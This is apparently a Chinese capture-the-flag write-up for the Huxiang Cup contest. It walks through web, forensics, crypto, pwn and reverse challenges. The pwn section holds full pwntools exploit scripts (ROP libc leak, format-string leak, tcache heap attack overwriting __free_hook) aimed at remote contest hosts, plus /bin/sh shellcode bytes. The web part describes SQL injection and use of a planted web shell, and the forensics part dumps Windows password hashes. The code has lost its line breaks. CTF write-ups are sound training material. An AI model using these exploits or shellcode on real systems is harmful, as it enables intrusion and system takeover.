slax9Linux中文,湖湘杯-WriteUp | CN-SEC 中文网
Web
题目名字不重要反正题挺简单的
解题思路
非预期,DASFLAG变量在phpinfo里显示出来了
NewWebsite
解题思路
http://47.111.104.169:56200/?r=content&cid=2
cid参数存在SQL注入漏洞,没有任何过滤,得到后台账号密码为admin/admin
进入后台发现水印图片那里有个php3文件,访问是phpinfo,没什么用
然后访问/upload/watermark/目录,发现可以目录遍历,有可以解析的shell文件
http://47.111.104.169:56200/upload/watermark/82061604228330.php3
盲猜密码cmd
Misc
password
下载后解压发现WIN-BU6IJ7FI9RU-20190927-152050.raw文件
直接拖到kali用volatility分析
volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw imageinfo
判断为Win7SP1x86
volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw --profile=Win7SP1x86 hivelist
获取SAM文件虚拟地址
volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw --profile=Win7SP1x86 hashdump -y 0x93fc41e8
导出Hash
CTF用户的hash拿去解密,密码明文为:qwer1234
然后sha1
db25f2fc14cd2d2b1e7af307241f548fb03c312a
颜文字
解题思路
题目是颜文字,其实和颜文字没啥关系。
wireshark打开数据包,发现有个index_demo.html的文件,把里面的内容复制出来保存在本地。
本地打开,右键查看源码发现一些类似base64的东西
KO+9oe+9peKIgO+9pSnvvonvvp7ll6hIaX4gCm==KO+8oF/vvKA7KSjvvKBf77ygOyko77ygX++8oDspCr==KCtfKyk/KOOAgj7vuL88KV/OuCjjgII+77i/PClfzrgKbygq77+j4pa977+jKinjg5bjgpwK77yc77yI77y+77yN77y+77yJ77yeKOKVr+KWveKVsCAp5aW96aaZfn4K44O9KOKcv+++n+KWve++nynjg44o77yg77y+77yQ77y+KQp=KF5e44Kezqgo77+j4oiA77+jKc6oKuKYhSzCsCo6LuKYhijvv6Pilr3vv6MpLyQ6Ki7CsOKYhSog44CCCp==flwo4omn4pa94ommKS9+byhe4pa9XilvKMKs4oC/wqwpKCriiafvuLbiiaYpKSjvv6Pilr3vv6MqICnjgp7ilLPilIHilLMo4pWv4oC14pah4oCyKeKVr++4teKUu+KUgeKUuwp=4pSz4pSB4pSzIOODjigg44KcLeOCnOODjingsqBf4LKgCn==4LKgX+CyoCjila/igLXilqHigLIp4pWv54K45by577yB4oCi4oCi4oCiKu+9nuKXjyjCrF/CrCApCp==KOODjuOBuO+/o+OAgSlvKO+/o+KUsO+/oyop44Ke4pWwKOiJueeav+iJuSAp77yI77i2Xu+4tu+8iSgqIO+/o++4v++/oyko77+jzrUoI++/oykKKO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAo=KMKsX8KsIiko77+j77mP77+j77ybKSjila/CsOKWocKw77yJ4pWv77i1IOKUu+KUgeKUu+ODvSjjgpzilr3jgpzjgIAp77yNQzwoLzvil4c7KS9+KOODmO+9pV/vvaUp44OY4pSz4pSB4pSzCu==4LKgX+CyoCjila/igLXilqHigLIp4pWv54K45by577yB4oCi4oCi4oCiKu+9nuKXjyjCrF/CrCApCo==KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIMK4oqZ77mP4oqZ4oil44O9KCrjgII+0JQ8KW/jgpwvKOOEkm/jhJIpL35+KCNfPC0p77yI77ye5Lq677yc77yb77yJCo==KOODjuOBuO+/o+OAgSlvKO+/o+KUsO+/oyop44Ke4pWwKOiJueeav+iJuSAp77yI77i2Xu+4tu+8iSgqIO+/o++4v++/oyko77+jzrUoI++/oykKKO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAq=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCm==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCs==KO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAp=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCr==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCt==KO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAr=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCi==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCn==KO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAo=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCp==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCq==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCl==KO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAq=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCl==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCi==KOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIKKOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIKKOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIKKOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIo4pWv4oC14pah4oCyKeKVr+eCuOW8ue+8geKAouKAouKAoijila/igLXilqHigLIp4pWv54K45by577yB4oCi4oCi4oCiKOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIKZmxhZ+iiq+aIkeeCuOayoeS6huWTiOWTiOWTiC==
网上搜了一下发现这是base64隐写,网上有现成的脚本
https://www.it610.com/article/1290949422569562112.htm
把base64隐写的东西保存成code.txt,解密脚本
def get_base64_diff_value(s1, s2):base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'res = 0for i in xrange(len(s2)):if s1[i] != s2[i]:return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))return resdef solve_stego():with open('code.txt', 'rb') as f:file_lines = f.readlines()bin_str = ''for line in file_lines:steg_line = line.replace('n', '')norm_line = line.replace('n', '').decode('base64').encode('base64').replace('n', '')diff = get_base64_diff_value(steg_line, norm_line)print diffpads_num = steg_line.count('=')if diff:bin_str += bin(diff)[2:].zfill(pads_num * 2)else:bin_str += '0' * pads_num * 2print goflag(bin_str)def goflag(bin_str):res_str = ''for i in xrange(0, len(bin_str), 8):res_str += chr(int(bin_str[i:i + 8], 2))return res_strsolve_stego()
运行完输出了一个key
然后将index_demo.html进行snow解密得到以下内容
base64隐写,snow解密,转莫斯
67b33e39b5105fb4a2953a0ce79c3378
隐藏的秘密
解题思路
提示计算机中没有这个用户,但是还是可以登录。众所周知隐藏账号一般为:test$这种。
接着用volatility分析这个附件,判断版本为Win2003SP2x86
列出SAM表的用户
然后拿得到的密文批量解ntml,将得到的明文信息和用户名对应,例如
JbpPIa4$:980099vz1rKjG$:565656yW1fMSd$:19861013oR9C4h0$:a520520etiH3Lp$:321321
接着把这些批量md5加密即可然后去平台爆破flag,由于第一次爆破忘记截图,后面再次尝试就不行了,所以没有最后出flag的那张图。
虚实之间
解题思路:可以先将附件中的mingwen的副本文件分离出来
修复数据包用winrar自带的或者7z直接能把mingwen副本.txt解压出来
使用ARCHPR对加密的文件进行明文爆破
爆破之后得到密码
进入原加密文件
再栅栏
Crypto
题古典美++
解题思路
SZWLVSRVVZICMUOJYIIZBSVSSITFSWHPCWCFPVPFXJMWRVJICVRGTCFLHPRJKJKSRVWYFUSEWHFXLHFOSFLYPFXXYFPOEGXFXMBUHVNIYHNDWXPGBXWSYBNDVQRVYRTZUWKTFSKUMVERCCRSBEMKEDRUNYYVRYKXFOKVLVXYGTRQZOEHFEYKJRKRVXFPBOINXFTCSRQCKIGBXWLVOQVVOSFLCRRWXYFQWUHWFGRVVZICMYBUQSKJASUWLRURVVBAVSCTZOPVEUWKKGLQZCRUHJBLRSRSBTFSCYIJICFVDRUUFSIHWYFQONPEGTYBUSMTUSFVVLLOEIGRRGFEGJKIKPMYURAEBHOIIVFNMBVRJKICGYHPMFQOJVLVQYGJHHZUUOJOESFJZVGSIBLUVPEINYZRGISVRHFKIIHPSRWHZTYDGRMEUKSEWMKXYGVPTKZQVVGMUOMHCLOVUMRIRTKICXRUJFSDSRUSWLGZCLRXTMAVESUZQCDDRRHCRKRTLUGHZQXFPLSFIXYFAIGESRSBGRVWYFDSCOTRTRWKZICMRVFXKYUYZZFIKPFSIVICGYTKHVJVAVRIECMYGKKMJJQVROPKIGBBQSKIGBXRJKVKPCLRXEMKEVXRJPGYRASSYJVWLVZJZROPKIGBBPIRUFCDHAYZGKFXPUORGRBEEZRVZQKRCMIKLXVWCBZIMWFJZFIJKICHFSSWUFSYRYJFUVZFLNBQJVUCCJISCBXIVCRFZRUPUBURAEXMICGXYFDOCORVWCFTRQVUMOEHRUJUCEGIIIMKDDRPNGZVVMMFDOCOIECWHYLWKJKSJKIJBGRROSLEGALVXSFESKWMEHQCDHAYFPSEHEIUFSTHRKSCCWWLVFYFKKPVUKSJHIKIYHNRYCEZSWRYIUFCLVEEEKWCHWUPUBZWLZOITFUCFVQSVDPZDCVRGPVBPBKVIMFPOCWLZOEGFIXYJQGFUXZOFSIOIJTMBJLRKICGTKSFMPCFPEEERVFXKYUFWJZEJOMHRYIIZECFGSGQMFKXRZUWTFUWYPUWEJSWGFSINRFXJSUJIRTRVVUINBQBFRRVUMZZVXVORCYHVJUGZCLXNBQUFRHGSYQKLGVUMGRBMKPTSIBIJUFOKVESPSHKKIIJEVKGMJUYBTHFLURVVQMNPLRVUAYBRZRWMKVBSFUPFOEWKXHVJTSXRXKPYZZFIYBBBFLHVBUVRWPRUGHLGINBQCIOSEHGHLGIVJRVVUFLURVFXKYURVVBAVSCBZFIXSYBUZSIEQHFVEPQPSJHRKMWGYHFVHYBRJEZOGKFQHVSGTZVLRMJTROPIJEVKWLIPSUYWLVFYFKKLFXDIEQCZUJZJHIDUMQFPIFVRODRRXUFSGHSGMCHYDXNBJYNLXYUFSZULVBBGURAEXYFUWLVBLHZSEKIGSJLXYJLYJKINBQFRWLVSEZRGXYFPSNDWEPMBVOMJUCBZQKKIGGKLQVBQWKGMUORGFXRUBROCOXYFPWXKXNPPRSXXZTFOCOLRWCHFDWBUFSDZLRURVVQEDFMTKKITPSBKUCZTWCLNRFXNZVDWVNYODLWKIGGEHAQFYZRQHFSYIJWVRMGORQHJICHILIUUMQLUXJFWOJVLVTNCBHJROAMTXVKTCMZQKRTWCLUIWBJZZQKKIPCLJLKICOZUHFZMIKKMELWCLFSLMBARQEXFGHRQHNIYHRQMXOMFRQXCJRHCHKZSJGYHPCUFWENQVGMFRVOZOEBFLXCMLSMHVUPRCRVOGFPVRSWZTFOCOWVFGHNUMKUCBLSWFNCKYHVV
维吉尼亚密码加密解密,在一般的网站上解密必须有秘钥
github上有一个猜测秘钥开源项目
https://github.com/atomcated/Vigenere
全部改成大写ORDERBY,md5加密一下就是flag
C82BBC1AC4AB644C0AA81980ED2EB25B
LFSXOR
解题思路
题目由两个LFSR伪随机数生成器来生成两个密钥流元
然后分别对content加密了一次,得到两组密文
切入点在于两个密钥流元的周期很短,并且互素,一个是15,一个31
因此第一个密钥流元的某一个密钥存在和第二个密钥流元的每一个密钥加密了同一个明文的情况。
于是根据异或运算的对合性,可以通过爆破一个密钥流元的一个字节来恢复另外整个密钥流元,从而实现对密文的解密。
cipher1 = 'xbbxd3x08x15xc6:x08xb2xb2x9fxe4pxc7xecx7fxfd)xf6fx9cxe4xd12xaeJx81xb1x88xabxa5Vxa9x88x14xdf`~xf6xdbJxb4x06S!0xbbxe4x1axe6Rx8ex84Xx19Kx95x07Cxe8xb2'xa9x80x15xecx8fx8dYnKx85x99xb7!x134xa9xb6x15xcf&rx9bxe1x99xe4]3h~xf0xa9xa5x14xee}xd19lx14hx07v *a0x12x14xfex0fx05xdemx1dxe4s2Jx7fxc28xf6RRx8exbaxb2mx18Mxf1xef!4x17xa8xb4x14xc2x8fxb9Y:Kxaax06T!x1bxbbxfdxf6Gvx8ex9axebxd9Kxbbx06Nx9ax82cxa9xa0x14xed!x04xdbmx13xe5w3Bx7fxd0xa9xbfxb7x9cxe3xd00x83Kx86xab3x7fxc1xbbxfdx11x15xdfx8ex80Yx07xd8xe5]2mxe9xbbxce`x91ox8fx8cY!x81xe4Jx92x8cxa7Tx16Ex15xf1WMY(xb8[x8e2y~xcbMx10x15xc7x1fWYx0cKx87xcexe5 !bxa8x83x14xec6xd1!xc8x905xe52Lxf1xbaxcfnx9dx9dxe7uxadmx06xe4n2rxd8xbaxedxf6x7fx9dxd8xd02mx12Gx07Yx89x7fxc0xa8xa4x15xe5x043Yx1eJxaex07nx94x87xbbxcf_x8dx9dxd1x14Y,x9exe5bxd7x8cx7fxf7xa8x8fx14xc7x8fxb3xb6xf1x93xe4Oxddxc4xdbxbaxf6!x15xfd.xd1x18xcfxf6x03xea2Ex7fxe1xa9xa5xfex9dxc9xd1;xd9xeex05x06zxc8xb2xbbxe2xf7{JW4xcdmx1axe5Ux8d x0f&x14x7fxf6x9dxd4Exbfxc3xdbxe4Lxe1xf7x90xbbxdaZxf4x9dxd13xb8m3xe2D3o~xf8Hxf6U*x07lYx03Kxabx07~xa3x87xbbxc9xf7sAQx08Y6Jx86x07Yxecxf7xbbxc6sx15xc6x7fEYx02Jx95x07Z x11xbbxc6Tx15xfc-xd0x06xe6x9f-x07^ x15xbbxcczx14xf3x8fx97xd4l9tx85xe8x8axbexbbxf9xf6fx9dxf2xd19xa2Kxb6xcdxcfxf6~xd5xa9xaax15xd8x8exb3x81m9xe4fxb2!x1exbaxd8sxfdx11x08Wxa1l;x01x07_!x11xbbxddxf6xx9dxf0x17Yx15xfex02xc7xa0!.Wxa9xa5x8fx9cxe8xd1x12mx04xe5s3Q~xddxa9xa3x15xdbx8fxacxafxecxbbx10xde2_xbaxbaxe8xf6f.x1exd1x17lx06xe4Uxddxf0xd6~x0fAx14xcbx8exb0Yx1fJxb2xe4xb3!"xbaxfeUx14xedYxd0>l-~x06P 1xbbxf2xf6waDxd1(mx12`[email protected]b6~xfaxa9xb1xb0x9dxfbx18xfbm&xe4v2wxcexbaxcboxd5x07x11QXxc8x9cxd3xd03x9dxb5x1exd72Sxf2ryxf1Wx9cxc89YrKx8fxffx8axe0xb5{xa9xaexb1x9dxddxd1=xbeKxa3x06e!x08xbaxd2xf6jx9cxf6xd0x0fl#xe5oxf5xaa~xc2xa9x99x15xea6xd1:xe7xa8xe4nxbb nVxa9x91x14xf9}xd0!m/xe5|2ox81xbaxf8rx14xebtRxc9xecxdd`xbfxc6x81xdfKXWxb3o.%xa9xcdxb9x14xfdx97x83x8eOnx03xb6iuuxabx9dxbcx15xf4xc3xd6xc1'cipher2 = 'pxfdx1ffxcaBxa5xe6`x87xa8x8cix855x92O8Pxa5}^xd8xedx1ax88=cxe0x9fxedqxf8xe1%x7fXxd2xbaxbex03xa8x9ax9cx075x98"xcaxedxa4C^xc6.jxecxfax10xa7xd9x01x06x87x90fxccxf6x1bx0cxdexcc,xfbxf0xc74x94xcfjx8ayxd5xd2`[email protected]!DSpxf5x12fxf1xf6#x80xbex16xa8xaeFxd0xd1xd4xadxb9xf7#x16x08xb2[x1ax87x8bxa0xfaEFxbfx86x8bx8cx90xa4xd5xfbcRxe2Wx9cn5x8bxcfQ"xf2x16x10xb2Ix1ax88x8bx8cjx16xebpxccSxd2x90xa8|qx05xafqxfaxcaHE{x1axba#xfdx17/xb2Lx1ax87x8ax90xc9Dmpxefx0efxf2Z|Sx00Rxfcx1cx9dn5x84xceSxb0xa4M_xffxb9x1ax8ax1d\x98D\pxcb*fxdcVxd0xd5Qxecx1axfaxf0x91xa8xd4x8axcax9c-x17x07xb2_xffnx8ax83xfbxc2x00x10x87x83xaeFxf7#xd4xbe'xa9x8a$IMpx14xe8xc0xa4zxd1xb2Hxe6ex8bxb0xcfxb1x01/i}tx03xc1x84x00!x86x93gxedxf7x1dxc3xbfx01cx06KI[xd5x929gxa4tx87xb2\x1bx8dx0bxd9x0bDpxf5omxe1x16x0e}|[email protected]\cx17&x07xc8xda~x8bx88x86DSxebx87x87fxdaxf73rxcaSxd9xfaxfaI`xd5x889^Rx97xaeFxf6x1ax92Nxd8*Erxc3x16xe0)x91xba|_Qx83x00>;xff5x82xceX"xd7x17x08Pxaex1axb1x8ax8fxc9Epxa7x86x86gxf6m|oxbfx1cxa9xa1x9c+xc9x1excfI#xfcx92^xc1xb8x1bxadx8ax9exceEuxb8$xe0x0bx90x87}[x0fSxcab]xd2xaaUxcfh"xfcxa2_xdd/yx15xc71x06x8dxacx19xa0tx0elxe9xc6%4x9dx80Uxe3xfdFx8dxeex17.+x9bxb3xf0x83wx16xd9'for one in range(256):turekey = [0]*31i = 0for one in range(31):turekey[i % 31] = chr(ord(cipher1[i])^ord(cipher2[i])^ord(one))i += 15flag=""for i in range(len(cipher2)):flag+=chr(ord(turekey[i%31])^ord(cipher2[i]))if 'DASCTF' in flag:print flag
PWN
what the f**k printf?
解题思路
输入完15个0x1f后就可以溢出
from pwn import*context.log_level = 'debug'elf = ELF('./pwn_printf')p = remote('47.111.96.55',54606)libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')gadget_list = [0x45226,0x4527a,0xf0364,0xf1207]puts_plt = elf.plt['puts']puts_got = elf.got['puts']pop_rdi_ret = 0x401213payload = "0x20"*15p.recvuntil('interestingn')p.sendline(payload)payload = "a"*8payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) +p64(pop_rdi_ret)payload += p64(0x40) + p64(0x4007C6)p.sendline(payload)#-----------------------------------------puts_addr = u64(p.recv(6).ljust(8,'x00'))libc_base = puts_addr - libc.symbols['puts']var = libc_base + gadget_list[2]#-----------------------------------------payload = "a"*8payload += p64(var)p.sendline(payload)p.interactive()737e31e0437d1f6d960ce8d4c887cb9a
Blend_pwn
解题思路
# _*_ coding:utf-8 _*_from pwn import *context.log_level = 'debug'context.terminal=['tmux', 'splitw', '-h']prog = './blend_pwn'#elf = ELF(prog)# p = process(prog)#,env={"LD_PRELOAD":"./libc-2.27.so"})libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")p = remote("47.111.104.169", 57704)def debug(addr,PIE=True):debug_str = ""if PIE:text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)for i in addr:debug_str+='b *{}n'.format(hex(text_base+i))gdb.attach(p,debug_str)else:for i in addr:debug_str+='b *{}n'.format(hex(text_base+i))gdb.attach(p,debug_str)def dbg():gdb.attach(p)#-----------------------------------------------------------------------------------------s = lambda data :p.send(str(data)) #in case that data is an intsa = lambda delim,data :p.sendafter(str(delim), str(data))sl = lambda data :p.sendline(str(data))sla = lambda delim,data :p.sendlineafter(str(delim), str(data))r = lambda numb=4096 :p.recv(numb)ru = lambda delims, drop=True :p.recvuntil(delims, drop)it = lambda :p.interactive()uu32 = lambda data :u32(data.ljust(4, ' '))uu64 = lambda data :u64(data.ljust(8, ' '))bp = lambda bkp :pdbg.bp(bkp)li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))def dbgc(addr):gdb.attach(p,"b*" + hex(addr) +"n c")def lg(s,addr):print(' 33[1;31;40m%20s-->0x%x 33[0m'%(s,addr))sh_x86_18="x6ax0bx58x53x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"sh_x86_20="x31xc9x6ax0bx58x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"sh_x64_21="xf7xe6x50x48xbfx2fx62x69x6ex2fx2fx73x68x57x48x89xe7xb0x3bx0fx05"#https://www.exploit-db.com/shellcodes#-----------------------------------------------------------------------------------------def cho(idx):sla("Enter your choice >",str(idx))def add(con='a'):cho(2)sla("input note:",con)def delete(idx):cho(3)sla("index>",idx)def sho():cho(1)def show():cho(4)def magic(strt):choice(666)sla("Please input what you want:",strt)def exp():# debug([0x11cb])sla("Please enter a name: ","%11$p")ru("wrong!")#-------------------------------------------------------------leak libcsho()ru("Current user:")ru("0x")data = int(r(12),16)addr = data - libc.sym['__libc_start_main']-240lg('addr',addr)one = addr + 0x4526a#---------------------------------------------------------------leak heap# magic("a"*0x28)pay = p64(one)*4+p64(0)*12add(pay)add(pay)delete(0)delete(1)show()ru("index 2:")# ru("0x")heap = uu64(r(6))lg('heap',heap)#---------------------------------------------------------------trigerlg('one',one)magic(p64(one)*4+p64(heap+0x20)[0:6])#最后四位可以覆盖rbpit()if __name__ == '__main__':exp()
babyheap
解题思路
# _*_ coding:utf-8 _*_from pwn_debug import *pdbg=pwn_debug("babyheap")pdbg.context.terminal=['tmux', 'splitw', '-h']context.log_level='debug'pdbg.local("./libc.so.6")#32/64pdbg.debug("2.27")pdbg.remote('47.111.104.169',56303)switch=3if switch==1:p=pdbg.run("local")elif switch==2:p=pdbg.run("debug")elif switch==3:p=pdbg.run("remote")#-----------------------------------------------------------------------------------------s = lambda data :p.send(str(data)) #in case that data is an intsa = lambda delim,data :p.sendafter(str(delim), str(data))sl = lambda data :p.sendline(str(data))sla = lambda delim,data :p.sendlineafter(str(delim), str(data))r = lambda numb=4096 :p.recv(numb)ru = lambda delims, drop=True :p.recvuntil(delims, drop)it = lambda :p.interactive()uu32 = lambda data :u32(data.ljust(4, ' '))uu64 = lambda data :u64(data.ljust(8, ' '))bp = lambda bkp :pdbg.bp(bkp)def bpp():bp([])# input()def dbg(arg):bp([arg])#input()def lg(s,addr):print(' 33[1;31;40m%20s-->0x%x 33[0m'%(s,addr))elf=pdbg.elf# libc=pdbg.libcsh_x86_18="x6ax0bx58x53x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"sh_x86_20="x31xc9x6ax0bx58x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"sh_x64_21="xf7xe6x50x48xbfx2fx62x69x6ex2fx2fx73x68x57x48x89xe7xb0x3bx0fx05"#https://www.exploit-db.com/shellcodes#-----------------------------------------------------------------------------------------libc = ELF("./libc.so.6")def cho(idx):sla(">>",str(idx))def add():cho(1)# sla("input note:",con)def delete(idx):cho(4)sla("index?",idx)def show(idx):cho(2)sla("index?",str(idx))def edit(idx,sz,con):cho(3)sla("index?",str(idx))sla("Size:",str(sz))sa("Content:",con)def exp():# debug([0xB0C])#-----------------------------------------leak libc & heapshow(-14)ru('n')data = uu64(r(6))lg('data',data)addr = data - libc.sym['_IO_2_1_stdout_']lg('addr',addr)fh = addr+libc.sym['__free_hook']sys = addr+libc.sym['system']lg('sys',sys)#-----------------------------------------shell#下面的操作类似于lctf2018-pwn-easy_heap#------------------------step1for i in range(7):add()for i in range(3):add()# 7 8 9for i in range(6):delete(i)delete(9)for i in range(6,9):delete(i)#------------------------step2for i in range(7):add()add()#7add()#8add()#9for i in range(6):delete(i)delete(8)#tcachedelete(7)add()# dbg()# raw_input()edit(0,0xf8,'a')delete(6)delete(9)#------------------------step3for i in range(7):add()add()add()add()delete(9)edit(4,0x20,'/bin/shx00')edit(0,0x20,p64(fh))add()add()edit(11,8,p64(sys))delete(4)# dbg()it()if __name__ == '__main__':exp()
Reverse
easyZ
刚开始静态分析一直在报错,搞得以为是我的电脑的问题。
尝试动态调试无意间发现qemu这玩意。
然后继续搭建环境,动态调试。
感觉等找到的时候高数也就不是什么问题了。不过还是强,还是被找到了。
该反击了,开始后开始反向定位,找到反汇编,看着指令一点一点的调试。
程序就是先判断输入长度,然后加密比较。
也不想搞花里胡哨的,直接爆破不香吗?不禁感叹就这???
a = [0x0000b2b0, 0x00006e72, 0x00006061, 0x0000565d,0x0000942d, 0x0000ac79, 0x0000391c, 0x0000643d,0x0000ec3f, 0x0000bd10, 0x0000c43e, 0x00007a65,0x0000184b, 0x0000ef5b, 0x00005a06, 0x0000a8c0,0x0000f64b, 0x0000c774, 0x000002ff, 0x00008e57,0x0000aed9, 0x0000d8a9, 0x0000230c, 0x000074e8,0x0000c2a6, 0x000088b3, 0x0000af2a, 0x00009ea7,0x0000ce8a, 0x00005924, 0x0000d276, 0x000056d4,0x000077d7, 0x0000990e, 0x0000b585, 0x00004bcd,0x00005277, 0x00001afc, 0x00008c8a, 0x0000cdb5,0x00006e26, 0x00004c22, 0x0000673f, 0x0000daff,0x00000fac, 0x000086c7, 0x0000e048, 0x0000c483,0x000085d3, 0x00002204, 0x0000c2ee, 0x0000e07f,0x00000caf, 0x0000bf76, 0x000063fe, 0x0000bffb,0x00004b09, 0x0000e5b3, 0x00008bda, 0x000096df,0x0000866d, 0x00001719, 0x00006bcf, 0x0000adcc,0x00000f2b, 0x000051ce, 0x00001549, 0x000020c1,0x00003a8d, 0x000005f5, 0x00005403, 0x00001125,0x00009161, 0x0000e2a5, 0x00005196, 0x0000d8d2,0x0000d644, 0x0000ee86, 0x00003896, 0x00002e71,0x0000a6f1, 0x0000dfcf, 0x00003ece, 0x00007d49,0x0000c24d, 0x0000237e, 0x00009352, 0x00007a97,0x00007bfa, 0x0000cbaa, 0x000010dc, 0x00003bd9,0x00007d7b, 0x00003b88, 0x0000b0d0, 0x0000e8bc]b = [0x08a73233, 0x116db0f6, 0x0e654937, 0x03c374a7,0x16bc8ed9, 0x0846b755, 0x08949f47, 0x04a13c27,0x0976cf0a, 0x07461189, 0x1e1a5c12, 0x11e64d96,0x03cf09b3, 0x093cb610, 0x0d41ea64, 0x07648050,0x092039bf, 0x08e7f1f7, 0x004d871f, 0x1680f823,0x06f3c3eb, 0x2205134d, 0x015c6a7c, 0x11c67ed0,0x0817b32e, 0x06bd9b92, 0x08806b0c, 0x06aaa515,0x205b9f76, 0x0de963e9, 0x2194e8e2, 0x047593bc]for i in range(32):for j in range(32,127):temp = j*j*a[(i<<2)//4] + a[((i+32)<<2)//4]*j + a[((i+64) << 2)//4]if temp == b[i]:print(chr(j),end='')break
easyre
解题思路
这题放入IDA可以看到,在main中其实是没有关于flag的check部分的。有的只是对flag的长度的一个check,仅仅只是要求了flag的长度为0x18。之后就会ret,会到上一级函数。这里我没有选择去用IDA深究,而是用OD去动态调试看一下。
向下跟进可以看到在main返回之后,会有一个加密的过程。先将第一个字符与0xe0存到栈中。之后就是第一个字符左移3位,第二个字符右移5位,之后取或运算。之后异或循环变量也就是字符数组下标。大致伪代码就是(((input[i])|(input[i+1]))&0xff)^i。最后将存入栈中的变量和最后一位做运算。
再次ret可以看到check部分,找到加密flag之后的数据。
